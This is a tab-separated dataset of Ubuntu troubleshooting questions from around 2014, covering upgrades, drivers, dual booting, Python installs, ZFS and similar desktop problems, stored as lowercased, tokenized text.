: read 8 bytes from daemon [ +630.60s ] debug : read 12 bytes from daemon [ +630.60s ] debug : authentication complete for user with return code 0 [ +631.58s ] debug : starting authentication for user ashish ... [ +631.58s ] debug : wrote 22 bytes to daemon [ +631.59s ] debug : read 8 bytes from daemon [ +631.59s ] debug : read 36 bytes from daemon [ +631.59s ] debug : prompt user with 1 message ( s ) [ +934.66s ] debug : settings-daemon.vala:209 : screensaver activated
512142	authentication key error	i downloaded ubuntu 14.04 lts i386 from community website i did nt get any problem while installing it but now to update or to install any other application it is asking me authentication key but i ve not given any authentication key while installing.please guide me what to do
512144	dual boot windows 8.1 and ubuntu 14.04.1 lts on sony vaio	i managed to install ubuntu in a sony vaio laptop with windows 8 pre-installed and updated to windows 8.1 . after i finished the process , i experienced the same behavior than `` landroni '' ( how to fix dual-booting windows 8 and ubuntu 14.04 on a sony vaio ? ) . however , i do not need to enable external device boot , as he says at the final of his post . the boot-repair tool generated this url ( http : //paste.ubuntu.com/8048145/ ) . i understand that boot-repair tries to modify the boot order in the machine by pointing to grub . in this site ( http : //www.zdnet.com/my-experiments-with-multi-boot-selection-with-uefi-boot-manager-7000013627/ ) , the author explains how to manually change the bootloader , however , by looking into the report generated by boot-repair , i saw there are three bootmgfw.efi files in three different partitions ( sda1 , sda2 and sda3 ) . i am afraid to mess things up by chosing the wrong file . can anyone help ? thanks ,
512147	keyboard & mouse not working after ubuntu 14.04.1 lts installitaon	my mother board is a gigabyte ga-m91pme-s29 after installing ubuntu 14.04.1 lts os my keyboard and mouse are not working . i tried all the usb/ps2 ports but none of them are working . what can i do ?
512148	how can i tidy up the mess that is my python installations ?	i had a ubuntu 12.04 system which i eventually managed to get python 2.7 and python 3.2 working together ( with pip and pip3 ) and python 3.3 ( with pip3.3 ) for good measure . i 've recently upgraded to ubuntu 14.04 and have decided to take advantage of the python3-pip package . i 've also upgrade my python3 package to install python 3.4 . all i really want is to be able to use python ( python2 ) and python3 as well as do package management using pip and pip3 . which of the following files and directories can i delete to make this installation less messy and confusing ? /usr/bin/easy_install-2.7 /usr/bin/easy_install3 /usr/bin/easy_install-3.4 /usr/bin/pip3 /usr/bin/python /usr/bin/python /usr/bin/python2 /usr/bin/python2.7 /usr/bin/python2.7-config /usr/bin/python2-config /usr/bin/python3 /usr/bin/python3.3 /usr/bin/python3.3m /usr/bin/python3.4 /usr/bin/python3.4-config /usr/bin/python3.4m /usr/bin/python3.4m-config /usr/bin/python3-config /usr/bin/python3m /usr/bin/python3m-config /usr/bin/python-config /usr/lib/python2.7 /usr/lib/python3 /usr/lib/python3.3 /usr/lib/python3.4 /usr/local/bin/easy_install /usr/local/bin/easy_install-2.7 /usr/local/bin/easy_install-3.2 /usr/local/bin/easy_install-3.3 /usr/local/bin/pip /usr/local/bin/pip2 /usr/local/bin/pip2.7 /usr/local/lib/python2.7 /usr/local/lib/python3.2 /usr/local/lib/python3.3 /usr/local/lib/python3.4 also , both pip and pip3 are currently version 1.5.4 , how can i update them both to version 1.5.6 without screwing anything up ?
512149	/sbin/init missing after upgrade to newest version	after latest ubuntu upgrade unable to boot into ubuntu which gives message as /sbin/init missing . i use a dual boot system .
512152	how do you do a fresh install of ubuntu 14.4 on an existing ubuntu partition	i can only open ubuntu in safe mode now after mistakenly upgrading to ubuntu 14.4 lts , having already done it about a month before . i responded to a pop up window without thinking . how do i do a fresh install ? when i select the ubuntu option on boot up now , the the computer freezes and the cursor disapears . thence my using safe mode . thank you .
512155	make workspace 2x2 on ubuntu 14.04.1 lts	i would like to use 2x2 workspaces . i am heavily used to it and after i bought a new notebook and installed ubuntu 14.04.1 lts 64-bit with gnome , it just does n't work . i installed compiz manager and tried a few suggestions i found out on the internet , but nothing work . i tried setting only 1 desktop and hoped compiz would handle those 4 viewports , but it did n't happen . i tried setting compiz desktop size- > horizontal and vertical size to 2 and 2 . this is my compiz manager : thanks for any suggestions on how to get 2x2 workspaces working .
512159	installer stopped while upgrading from 12.04 to 14.04	i 'm upgrading from 12.04 to 14.04 on an optiplex 745 ( dual-boot with windows xp ) and it 's frozen at this line : installing new version of config file /etc/kernal/posttrm.d/zz-update-grub ... can i get the process to re-start ?
512160	upgrading to python 3.4 from 3.2	i have ubuntu 12.04 and python 3.2 installed . when i use sudo apt-get install python3 , it says that my python is 'already the newest version ' . however , 3.4 is the latest . how would i upgrade my current python to 3.4 ?
512161	change gdm in ubuntugnome 14.04.1	i 've been searching the web and ca n't figure out how to do this , only that i can do this . i recently installed a fresh install of the ubuntu gnome 14.04 flavor and love it so far , especially with all of the opportunities to tweak and customize . the last thing i want to change though is the theme for the gdm- it 's so ugly ! i though the lightdm that came stock in ubuntu 14.04 was handsome , but ubuntugnome 's gdm is not so much . i see a lot of themes for this that look great but i have no idea how to install them ! also , is it possible to install lightdm despite using a full ubuntugnome flavor , as in i 'm not just running gnome shell in regular ubuntu ? tl ; dr help me install a new gdm theme in ubuntugnome 14.04 ?
512162	libreoffice-base not configured yet	i have the libreoffice ppa installed ( ppa : libreoffice/ppa ) and today i had a problem after updating . i got the following error . reading package lists ... done building dependency tree reading state information ... ready you might want to run 'apt-get -f install ' to correct these . the following packages have unmet dependencies : libreoffice-base : depends : libreoffice-base-core ( = 1 : 4.3.0-0ubuntu1 ~ precise1 ) but 4.3.0-3ubuntu1 ~ precise1 is installed depends : libreoffice-base-drivers ( = 1 : 4.3.0-0ubuntu1 ~ precise1 ) but 4.3.0-3ubuntu1 ~ precise1 is installed depends : libreoffice-core ( = 1 : 4.3.0-0ubuntu1 ~ precise1 ) but 4.3.0-3ubuntu1 ~ precise1 is installed libreoffice-core : breaks : libreoffice-base ( < 1 : ~ 4.3.0-3ubuntu1 precise1 ) but 4.3.0-0ubuntu1 ~ precise1 is installed e : unmet dependencies . try to use -f. after trying sudo apt-get install -f i got the following output pakketlijsten worden ingelezen ... klaar boom van vereisten wordt opgebouwd de status informatie wordt gelezen ... klaar vereisten worden gecorrigeerd ... klaar de volgende extra pakketten zullen ge誰nstalleerd worden : libreoffice-base voorgestelde pakketten : libreoffice-gcj libreoffice-report-builder unixodbc de volgende pakketten zullen opgewaardeerd worden : libreoffice-base 1 pakketten opgewaardeerd , 0 pakketten nieuw ge誰nstalleerd , 0 te verwijderen en 0 niet opgewaardeerd . 3 pakketten niet volledig ge誰nstalleerd of verwijderd . er moeten 0 b/2170 kb aan archieven opgehaald worden . door deze operatie zal er 2841 kb extra schijfruimte gebruikt worden . wilt u doorgaan [ j/n ] ? dpkg : vereistenproblemen verhinderen de configuratie van libreoffice-base : libreoffice-base is afhankelijk van libreoffice-base-core ( = 1:4.3.0-0ubuntu1~precise1 ) ; maar : versie van libreoffice-base-core op dit systeem is 1:4.3.0-3ubuntu1~precise1 . libreoffice-base is afhankelijk van libreoffice-base-drivers ( = 1:4.3.0-0ubuntu1~precise1 ) ; maar : versie van libreoffice-base-drivers op dit systeem is 1:4.3.0-3ubuntu1~precise1 . libreoffice-base is afhankelijk van libreoffice-core ( = 1:4.3.0-0ubuntu1~precise1 ) ; maar : versie van libreoffice-core op dit systeem is 1:4.3.0-3ubuntu1~precise1 . libreoffice-core ( 1:4.3.0-3ubuntu1~precise1 ) breaks libreoffice-base ( < < 1:4.3.0-3ubuntu1~precise1 ) and is ge誰nstalleerd . version of libreoffice-base to be configured is 1:4.3.0-0ubuntu1~precise1 . dpkg : fout bij afhandelen van libreoffice-base ( -- configure ) : vereistenproblemen - blijft ongeconfigureerd dpkg : vereistenproblemen verhinderen de configuratie van libreoffice-report-builder-bin : libreoffice-report-builder-bin is afhankelijk van libreoffice-base ; maar : er is geen apport-verslag weggeschreven omdat de foutmelding volgt op een eerdere mislukking . pakket libreoffice-base is nog niet geconfigureerd . dpkg : fout bij afhandelen van libreoffice-report-builder-bin ( -- configure ) : vereistenproblemen - blijft ongeconfigureerd dpkg : vereistenproblemen verhinderen de configuratie van libreoffice : libreoffice is afhankelijk van libreoffice-base ; maar : pakket libreoffice-base is nog niet geconfigureerd . libreoffice is afhankelijk van libreoffice-report-builder-bin ; maar : pakket libreoffice-report-builder-bin is nog niet geconfigureerd . dpkg : fout bij afhandelen van libreoffice ( -- configure ) : vereistenproblemen - blijft ongeconfigureerd er is geen apport-verslag weggeschreven omdat de foutmelding volgt op een eerdere mislukking . er is geen apport-verslag weggeschreven omdat de foutmelding volgt op een eerdere mislukking . fouten gevonden tijdens behandelen van : libreoffice-base libreoffice-report-builder-bin libreoffice e : sub-process /usr/bin/dpkg returned an error code ( 1 ) how can i solve this problem so the dependencies are solved ? do i have to configure libreoffice-base manually ?
512168	wireless lan ralink rt5370 not working	i am new to linux . would appreciate if you can help me with the below problem . i have a wireless lan - ralink . when i run the lsusb command , following is the output . bus 001 device 004 : id 148f:5370 ralink technology , corp. rt5370 wireless adapter bus 001 device 002 : id 058f:6387 alcor micro corp . flash drive bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 002 : id 045e:00cb microsoft corp . basic optical mouse v2.0 bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 002 device 001 : id 1d6b:0001 linux foundation 1.1 root hub during the first boot after the install , the wlan worked . however , after subsequent boots , the wlan ( network mgr ) shows the wlan ( home wifi ) but is unable to connect . i was reading through various web resource and finally followed the following steps as described in one of the posts . http : //ubuntuforums.org/showthread.php ? t=2218445 & page=2 i executed the following steps sudo apt-get install -- reinstall linux-headers- $ ( uname -r ) linux-headers-generic build-essential dkms wget media.cdn.ubuntu-de.org/forum/attachments/13/16/4365112-ralink_5370sta-2.5.0.3_dkms.tar.gz sudo tar xvf 4365112-ralink_5370sta-2.5.0.3_dkms.tar.gz -c /usr/src sudo dkms add -m ralink_5370sta -v 2.5.0.3 sudo dkms build -m ralink_5370sta -v 2.5.0.3 sudo dkms install -m ralink_5370sta -v 2.5.0.3 sudo mkdir -p /etc/wireless/rt2870sta sudo cp /usr/src/ralink_5370sta-2.5.0.3/src/rt2870sta.dat /etc/wireless/rt2870sta echo `` blacklist rt2800usb '' | sudo tee -a /etc/modprobe.d/blacklist.conf however , the issue still persists . i think earlier , iwconfig command used to show more entries , but now says no wireless extensions . appreciate any help here .
512175	how do i djvubind on ls and grep result ?	how do i djvubind only files that are in ls | grep -p `` page\\d\\d\\d.tif '' ?
512177	connecting ps3 dualshock on ubuntu 14.04 with 3.13.0-34-generic ?	the last entries/queries i can find about ps3 dual shock controller are dealing with older kernel versions . it looks like there may still be a problem with using the ps3 dual shock via usb ( or bluetooth ) with 14.04 ? i 'm only guessing because i get no sign of detection or input when i plug in the usb . when i run dmesg | grep sony [ 4687.762302 ] sony 0003:054c:0268.0003 : ca n't set operational mode [ 4687.770639 ] sony : probe of 0003:054c:0268.0003 failed with error -38 so at this point , i do n't know if it 's worth running : sudo apt-get install xboxdrv i also found this article link but it 's dated 01/2013 . i was considering installing steam , and checking out some of the games . there are a few in particular i want to check out , but i 'm afraid of purchasing them and then my controller does not work . i do n't have a ps3 , i just have the controller for sixaxis/emulator/android set up ... i see mentions for qtsixa and xboxdrv and known bugs , but the posts are at least a year old ( older distibution/kernels ) so i 'm wondering if the current kernel has fixed the bug . ideally , i 'd like to just plug in usb , and play . no bluetooth available right now..
512180	kvm dns access guest by using it 's hostname ( ubuntu 14.04 )	i have a guest machine running ubuntu 14.04 on an ubuntu 14.04 host running kvm/qemu . everything works fine except for one thing . given my guest 's hostname is virtual-machine-1 i would like to be able to find it from the host machine . ie : if on the host machine i use host virtual-machine-1 i would like it to return the guest 's ip . the documentation on kvm/networking states : if on your host machine you add 192.168.122.1 ( the default ip of your host in libvirt ) as your first nameserver in /etc/resolv.conf [ ... blabla it should work ] and this indeed works . but the resolv.conf file is regularly overwritten and the extra added line gets lost . which leads me to my question : what is the appropriate way to reflect this change ? here 's what i 've tried to no avail : adding it to /etc/resolvconf/resolv.conf.d/base adding the dns-nameserver to my /etc/network/interfaces file it seems like the nameserver 192.168.122.1 needs to precede any other ( including 127.0.1.1 ) . the documentation states that this is normal and that dnsmasq will handle it correctly . i just do n't know how to configure this in a lasting manner . thanks in advance .
512182	installed metasploit but it 's not working !	i have already semi-successfully installed the metasploit framework , but when i attempt to run the metasploit console ( msfconsole ) it returns with the error : /usr/local/bin/msfconsole:23 : in `require ' : no such file to load -- /usr/local /bin/config/boot ( loaderror ) from /usr/local/bin/msfconsole:23 i have been trying to fix this and searching on the web for days with no success . it 's starting to get really frustrating .
512183	unable to repair texmaker after upgrading to ubuntu 14.04	yesterday , i moved from ubuntu 12.xx to ubuntu 14.04 lts . i succeeded installing or reinstalling most of my applications , however , texmaker is resisting after many attempts . i 've tried using synaptic to re-install texlive and also the terminal , etc . i tried all what i found in the tex and ubuntu forums and was about to give up in despair when i decided to write this question : the quickbuild command returns without varying [ process started kpathsea : running mktexfmt pdflatex.fmt process exited with error ( s ) ] what can i do or try ?
512184	lubuntu desktop messed up for logged in user , but not for guest	i recently upgraded my laptop from lubuntu 12.04 to 14.04.1 and the upgrade process seemed to go fine . however , when i went to login as my normal user , i encountered an issue . the background loaded up , but none of lxde or lxpanel showed up , leaving me with an empty desktop and nothing else except two errors . i thought that this was weird , so i just figured something had been messed up and would be fixed by a reboot . but it was n't . i then tried logging in as guest , and it 's just fine . i checked the ~/.xsession-errors file ( for my main user , not guest , did it via tty1 ) and this is what i got : script for ibus started at run_im . script for auto started at run_im . script for default started at run_im . init : unable to register as subreaper : invalid argument init : lxsession main process ( 1649 ) killed by term signal init : disconnected from notified d-bus bus init : job dbus failed to stop init : job upstart-dbus-session-bridge failed to stop init : job upstart-dbus-system-bridge failed to stop init : job upstart-file-bridge failed to stop i also read the sometimes removing the ~/.xauthority file can help , if the ownership is messed up . ls -l /home/myuser/.xauthority tells me -rw -- -- -- - 1 myuser myuser 60 aug 16 09:57 /home/myuser/.xauthority . should that be root or something else , or should i try deleting that and ~/.profile . here 's what ~/.profile looks like : # ~/.profile : executed by the command interpreter for login shells . # this file is not read by bash ( 1 ) , if ~/.bash_profile or ~/.bash_login # exists . # see /usr/share/doc/bash/examples/startup-files for examples . # the files are located in the bash-doc package . # the default umask is set in /etc/profile ; for setting the umask # for ssh logins , install and configure the libpam-umask package . # umask 022 # if running bash if [ -n `` $ bash_version '' ] ; then # include .bashrc if it exists if [ -f `` $ home/.bashrc '' ] ; then . `` $ home/.bashrc '' fi fi # set path so it includes user 's private bin if it exists if [ -d `` $ home/bin '' ] ; then path= '' $ home/bin : $ path '' fi should i post the output of dmesg ? i 'll try and get a screenshot , but does anyone have any idea what could be causing the desktop ( lxde/lxpanel ) not to display ? edit i attempted removing the ~/.xauthority file , but that did n't seem to do anything . edit i have uploaded the contents of /var/log/xorg.0.log as it appeared right after a boot and login to the guest account to ubuntu pastebin as requested by braiam .
512185	is it necessary to upgrade to 14.04 lts or can i stand in 12.04 lts forever with no problem ?	i 'm using ubuntu 12.04 lts , and although i would like to upgrade to 14.04 lts , i do n't want to have any troubles after upgrading . for example , i do n't know if i can no longer use some of my software and have to reinstall it . i 'm also worry if my computer have the system requirements necessary to 14.04 lts version . that 's why i 'm asking if it is necessary to upgrade , i mean , will be any problem if i skip the upgrade ? can i stand in 12.04 lts forever ?
512188	login problems . passwords are correct but not accepted	i have 3 users with password ( 2 are admin ) , and one guest user without password . passwords are correct as i can go to terminal from login screen and i already checked all work fine . i can not log in to any of the user accounts protected with password ( from login screen ) . i can log in with the guest account without password . ( from where i can add or remove users as my password work fine . they are just now been accepted ) any idea why this is happening ? i thought about removing splash login screen . but because there is already a problem with passwords i would rather ask before .
512190	14.04 : homes over nfs slow login and slow starting apps	i upgraded clients from 12.04 to 14.04. everything seems to work , with one problem : we use ldap , and the home-directories are shared over nfs . if i login with some ldap user and try to start firefox , this takes several minutes . if i use a local home-directory for the same user , everything works fine . /etc/export /nfshomes/home0 @ workstation-hosts ( rw , async , no_subtree_check ) and /etc/fstab 10.0.2.2 : /nfshomes/home0 /nfshomes/home0 nfs bg , rsize=32768 , wsize=32768 , timeo=14 , intr 0 0 any idea ? thank you
512191	how can i install and use windows wireless drivers ( ndiswrapper ) in ubuntu 14.04	i hope someone can help me with my dilemma . i 'm trying to get my tl-wn821n usb wifi stick to work properly and keep finding new apporaches by thousands of people , that have the same problem . i found one of them stating that that with a program called windows wireless drivers you can simply install the original windows drivers . when i install ndiswrapper from ubuntu software center , synaptic package manager and even by .deb files , i have the same problem . i can not open the program with an interface . how can i use it , find it in ubuntu 14.04 ? i greatly appreciate some help on how to get my wifi stick to work in that way , or any other way ... but something that works . thanks .
512192	turn monitor back on after xrandr	i keep my laptop pc always connected to my hdmi tv . when i am watching a movie on the tv , i use the command xrandr -- output lvds1 -- off to turn my laptop screen off ( it is annoying to see the movie on a small screen beside the tv ) . so , with this command , the laptop screen is off , and everything is displayed in the tv the question is : how do i turn my laptop screen back on ? right now , i have to remove the hdmi cable , then it turns on . i would like to do it via command line . how ? ? ? ? ?
512194	alias to open multiple text files in different directories from terminal	after hours of searching and trying different gedit plugins i did not manage to add a session saver to gedit to open some files in ubuntu 14.04 ( see here ) . so , i am trying to create a permanent bash alias , editing ~/.bashrc to add it . the alias is : alias a= '' cd /home/konstantinosubuntu/desktop/abc & & gedit test1.c & & cd /home/konstantinosubuntu/desktop/xyz & & gedit test2.c '' then i use . ~/.bashrc to reload the changes i made to the aliases . but this alias only opens the first file ( here , test1.c ) and if i interchange the lines 2 and 3 it opens test2.c . that means there is no problem with the path . instead , the error i get is at the second & & which is bash : syntax error near unexpected token ` & & ' . why is this error appearing ? what alias should i use to open multiple files at once ?
512195	why does n't umask work as expected ?	please , can someone explain this to me ? i set : umask 000 touch afile.tmp result : -rw-rw-rw- 1 jay apache 0 aug 16 18:11 afile.tmp i was expecting this : -rw-rw-rw- to be like this : -rwxrwxrwx why is n't umask setting the 'x'`s of the permissions for new file modifications ?
512196	error creating partition	i am trying to create a new partition in a free slot of an hard drive using the gnome disk utility ( on 14.04 ) . i always get the message below : error creating partition on /dev/sda : command-line `parted -- align optimal -- script `` /dev/sda '' `` mkpart logical ext2 119947mib 225767517695b '' ' exited with non-zero exit status 1 : error : you requested a partition from 126gb to 226gb . the closest location we can manage is 126gb to 226gb . ( udisks-error-quark , 0 ) what can be the cause of this ? and can it be solved ? edit : a screen capture detailing the structure of this particular hard drive , with the partition at cause selected :
512198	there is how to change workspace only of the primary monitor ?	i 've two screens and i 'm using unity interface . in gnome shell we 're able to change the workspace of just the primary , what make sense for me . how can i do that on the unity ?
512203	ubuntu 14.04 usb media issues	recently i have been having trouble transferring files to external media ( phones , portable drives etc ) that were previously working fine . today i am trying to create a usb install using gparted but it throws an error anytime i try to open gparted with the usb unmounted . the error is ( gpartedbin:6486 ) : glibmm-critical ** : unhandled exception ( type glib : :error ) in signal handler : domain : g_convert_error code : 1 what : invalid byte sequence in conversion input i think these issues may be connected . i 'd be very grateful for any help on these issues .
512205	sound settings in xfce not showing	when i try to access the sound settings it opens the system settings windows which does not have any option that involves audio/sound settings . i am trying to use my bluetooth speakers as the audio output but i ca n't manage to find the audio settings . not even using xfce4-mixer i am not able to do this . thanks in advance !
512207	install fonts by drag and drop	can i drag and drop .ttf file to install font into ubuntu 14.04 ? because i want to install every font that my windows computer has . and it 'll be a waste of time to click and install it all one by one .
512208	how can i fix having to re-install the wireless driver every time i reboot ubuntu 14.04 ?	i have a mediatek 7630 wireless pci card , the driver is installed already but i have to run it every time i reboot , knowing that i 'm running ubuntu 14.04..
512210	i think i have a bug i can not open ubuntu software centre or synaptic package manager	an unresolvable problem occurred while initialising the package information . please report this bug for the 'update-manager ' package and try to include the following error message : 'w : duplicate sources.list entry http : //download.opensuse.org/repositories/isv : /owncloud : /community/xubuntu_12.10/ packages ( /var/lib/apt/lists/download.opensuse.org_repositories_isv : _owncloud : _community_xubuntu % 5f12.10_packages ) , w : duplicate sources.list entry http : //download.opensuse.org/repositories/isv : /owncloud : /community/xubuntu_12.10/ packages ( /var/lib/apt/lists/download.opensuse.org_repositories_isv : _owncloud : _community_xubuntu % 5f12.10_packages ) , e : encountered a section with no package : header , e : problem with mergelist /var/lib/apt/lists/download.opensuse.org_repositories_isv : owncloud : community_xubuntu % 5f12.04_en % 5fgb , e : the package lists or status file could not be parsed or opened . '
512211	error line 1 unmet dependencies !	i got on today and after being on for 30 min it crashed and said there was a internal error . after restarting i had a red negative sign in the top right hand side of my menu bar . it said to look in my system files to find the error . i found this : s # deb cdrom : [ ubuntu 14.04.1 lts _trusty tahr_ - release amd64 ( 20140722.2 ) ] / trusty main restricted can some one help me fix this ? i have no idea what caused or made this happen !
512212	how to mount a drive when in xmonad using terminal ?	so , i 've been itroduced to xmonad by now , and he tiling window manager seems classic . i 'm stuck when i have to access a file from another drive ( it 's a ntfs drive ) , so i found the way to list the drives with their label ( which i gave them in windows 7 ) . sudo lsblk -o name , label which results the below- $ sudo lsblk -o name , label name label sda ├─sda1 ├─sda2 ├─sda5 game drive ├─sda6 tjsvolume ├─sda7 softwares ├─sda8 ├─sda9 professional work drive └─sda10 sdb └─sdb1 sr0 but i could n't get success mounting with this sudo mount -t cifs -o ro /dev/sda1 i 'm a newbie and i know only few about this command .
512217	how to update/install ati radeon graphics to play wow	i installed wow cataclysm and my computer should run it smooth but i get 5-15 fps and when any other player is near i get 0-5 fps , even with all the graphics low , so i read that i should install/update the ati radeon drivers so that i could play somooth , but i donâ´t know how to do that ... my graphics card is ati radeon hd 3200 ... if you know any other way to boost fps tell me please , i have tried almost anything but this tho ...
512219	after executing do-release-upgrade ( 12.04 ) , the lsb_release -a still shows wrong version	i have executed do-release-upgrade on a 12.04 ubuntu server system . the upgrade went fine , but the welcome screen still shows 14.04 instead of 14.04.1 ( which i would expect ) . looking at the lsb_release -a output , it shows the old version lsb_release -a no lsb modules are available . distributor id : ubuntu description : ubuntu 14.04 lts release : 14.04 codename : trusty going deeper i have checked the /etc/lsb-release file and investigated what version of base-files package ( to which this file `` belongs '' ) is installed . i 've found out that my version is 7.2ubuntu5 whereas in my opinion it should be 7.2ubuntu5.1 as this version has correct release identification in the /etc/lsb-release file ( and other files ) . i suppose that the new version should have come with the do-release-upgrade , but it did n't for some reason . moreover , apt does not offer the newer version , i do not know why . any ideas what went wrong ?
512222	dell vostro 2520 wifi not working after ubuntu 14.04 update	i tried sudo apt-get install -- reinstall bcmwl-kernel-source wireless worked for sometime ... but after reboot wifi stopped again ... . can someone please help ... software center in additional drivers says ... .. broadcom corporation : wireless 1704802.11n + bt 4.0 this device is using an alternative driver using broadcom 802.11 linux sta wireless driver source from bcmwl-kernel-source ( proprietary ) what is the alternative driver ? and how to find it ? also , do help resolve this issue fast .
512224	how to tell if wine is rooted ?	iâve heard that wine can install window viruses if rooted . how can i tell if my wine is rooted ?
512227	permission denied error when installing ubuntu 14.04 with wubi	every time i try to install ubuntu 14.04 using wubi.exe , after 10 minutes the message `` permission denied '' is given and it points to a log file that i can not find .
512229	md5 checksum does n't match	i 'd like to install ubuntu 14.04 lts 64bit so i 've downloaded it to my harddrive . i checked the md5 checksum and it does n't match . mine is 119cb63b48c9a18f31f417f09655efbd the checksum given is dccff28314d9ae4ed262cfc6f35e5153 . i 've downloaded the iso image several times on different computers and even physically different locations and networks but the md5 checksum i keep getting is the one i mentioned above . is it me or could the reference md5 checksum be wrong ?
512234	zfs pool broken after upgrading to 14.04 lts	well , i have been putting off upgrading to 14.04 for fear that i would break something . actually for fear that it would break zfs ( or i would break it ) . i am bascially slightly better than novice at linux . spent the last couple of hours trying to get the pool back . now i am at the stage where i do n't think i have a complete failure , but i am worried that i may break it . so if could help me not break it , and recover it , i would be thankful . my zfs is file storage and not boot . it was working fine for a year and was working perfectly before the upgrade ( scrub and everything was fine ) . i was confident that the upgrade would work ( or at least i could fix it ) because i had upgraded once in the past , the pool went missing , but i was able to get it back . i have reinstalled zfs , zfs utilities , and some dependencies ( after searching this forum ) i think what happened is 14.04 deleted some config file , or specified disk names differntly , but i could be wrong . when i set the pool up originally , i was using specific device ids as i recall ( because i did not want to break things if they got reassigned at boot ) so see if this helps . i can confirm that old mountpoint folders are there but empty . no talloc stackframe at ../source3/param/loadparm.c:4864 , leaking memory pool : naspool1 state : unavail status : one or more devices could not be used because the label is missing or invalid . there are insufficient replicas for the pool to continue functioning . action : destroy and re-create the pool from a backup source . see : http : //zfsonlinux.org/msg/zfs-8000-5e scan : none requested config : name state read write cksum naspool1 unavail 0 0 0 insufficient replicas raidz1-0 unavail 0 0 0 insufficient replicas scsi-sata_wdc_wd1001fals-_wd-wmatv0990825 unavail 0 0 0 scsi-sata_wdc_wd1001fals-_wd-wmatv2995365 unavail 0 0 0 scsi-sata_wdc_wd10ears-00_wd-wmav51894349 unavail 0 0 0 ___ @ ourserver : ~ $ sudo zpool import naspool1 can not import 'naspool1 ' : a pool with that name is already created/imported , and no additional pools with that name were found ___ @ ourserver : ~ $ sudo zfs list no datasets available what other output can i post to help ? i 'm thinking the update deleted some zfs config files . it seems like the pool exists and certainly 3 perfectly working disks did not fail at once . i am worried that i may break something without a little bit of guideance . thanks .
512235	how can i install peerguardian ?	i tried to install peerguardian and expected it to be a simple run and install ... but its a tar.gz ! i’m completely new to linux and have no idea what that is , how to install it , or how safe it is ! can some one help me ? also i’ve heard peerguardian blocks your wifi connection , so if there is any one fluent with peerguardian i would appreciate your help as well .
512240	enable kde plasma 5 after installing in ubuntu 14.04	i have installed the neon5 plasma framework on my ubuntu 14.04 but i ca n't enable it i tried to look at unity tweak tool and compizconfig but did n't find anything any help ?
512242	errors during boot after installing the latest intel drivers	i used intel graphics installer 1.0.6 to install the latest drivers on my thinkpad laptop running ubuntu 14.04 . the laptop has intel integrated graphics ( 4500 ) . the error messages are : drm : module has bad taint , not creating trace events i915 : module has bad taint , not creating trace events [ drm : cpt_serr_int_handler ] : error pch transcoder a fifo underrun when i remove the i915 video drivers ( dkms module ) these errors go away . i can not see any after logging in . does anyone know what these errors are and if there 's a way to get rid of them ? i had a totally clean boot before this update .
512243	what are the different parts of the system monitor , and what do they all do ?	i know that there are the 3 tabs at the top , and there is the preferences menu , but what can each of these sections mean ? what is control group , and why is it blank ? there are a lot of fields that i can select and i wanted to know what each of them was . for example , why are there lots of processes with the same name ? also , what is the setting for bits and bytes ? i 'm quite confused by that , as the graph just shrinks , and the numbers at the edge get bigger when i change it . this is a topic that is very sparse , not just here but in general on the internet - i have done a lot of research but a lot of it has been fruitless . there is documentation about lots of programs , but not this one . i know that this is a fairly broad question in some ways , but in others it is quite specific . it is n't a duplicate - there is almost nothing about the system monitor on the internet , never mind just here . apologies if it is too broad , suggestions as to how to make it better are appreciated !
512246	peerguardian error	i installed peerguardian ( thanks to a lot of help ) and i get an error massage saying : could not use either kdesu ( do ) or gksu ( do ) to execute the command requested . you can set the path of the one you prefer in `` options - settings - sudo front-end '' i’m new to linux and peerguardian so i don’t know where or how to get to these `` options '' . i would be grateful if i was also told which addresses i should blacklist to torrent , and which ones to not so i can keep my wifi , hotmail ect .
512249	multi-touch does n't work in laptop ( lenovo z510 )	i have a laptop that is lenovo ideapad z510 ( i7 ) . in windows i can scroll page with 2 finger swipe on my touch pad but i ca n't do that in ubuntu 14.04.1 ! i want to active this . how ? ( i have install pointing device from ubunti software center and he show to me this result : ) enter link description here sorry my bad language because i 'm not english . very very very thanks .
512250	can you please provide step-by-step guide to dualbooting windows 8.1 with ubuntu 14.04	i 've currently got only ubuntu installed but i 'd like to dualboot it with windows 8.1 . i 've got the installation discs for both so that 's not a problem . yesterday i had win 8.1 and i followed a guide to dualboot it with ubuntu . in the end i failed at disabling safe boot , did n't find uefi settings and wiped out my whole drive , including ubuntu . so i had to reinstall ubuntu and currently all i have is ubuntu . i have an asus n56vz laptop , if that helps . i 've tried many guides but i still seem to fail . i 'd really appreciate it if any/some of you could help me . cheers !
512251	errors installing virtual box on 12.04lts 64bit	i get errors installing virtual box : apt-get -f install sudo dpkg -i ~/downloads/virtualbox-4.3_4.3.14-95030~ubuntu~precise_i386.deb ( reading database ... 313308 files and directories currently installed . ) preparing to replace virtualbox-4.3 : i386 4.3.14-95030~ubuntu~precise ( using ... /virtualbox-4.3_4.3.14-95030~ubuntu~precise_i386.deb ) ... unpacking replacement virtualbox-4.3 : i386 ... dpkg : dependency problems prevent configuration of virtualbox-4.3 : i386 : virtualbox-4.3 : i386 depends on libdevmapper1.02.1 ( > = 2:1.02.20 ) . virtualbox-4.3 : i386 depends on libpython2.7 ( > = 2.7 ) . virtualbox-4.3 : i386 depends on libvpx1 ( > = 1.0.0 ) . virtualbox-4.3 : i386 depends on psmisc . dpkg : error processing virtualbox-4.3 : i386 ( -- install ) : dependency problems - leaving unconfigured processing triggers for ureadahead ... processing triggers for shared-mime-info ... processing triggers for bamfdaemon ... rebuilding /usr/share/applications/bamf.index ... processing triggers for desktop-file-utils ... processing triggers for hicolor-icon-theme ... errors were encountered while processing : virtualbox-4.3 : i386 can someone please help me out ?
512253	icon theme does n't apply to nautilus at all !	you can see that i have applied the 'simple ' icon theme in gnome . i am using ubuntu gnome . and have download the tarball then extracted it into the /.icon before applying it through gnome tweak tool . but apart from system icons , nautilus icons fail to change i have restarted my computer , and tried to keep the extracted folder in /usr/share/icons/ by sudo nautilus but still it does n't work . please help
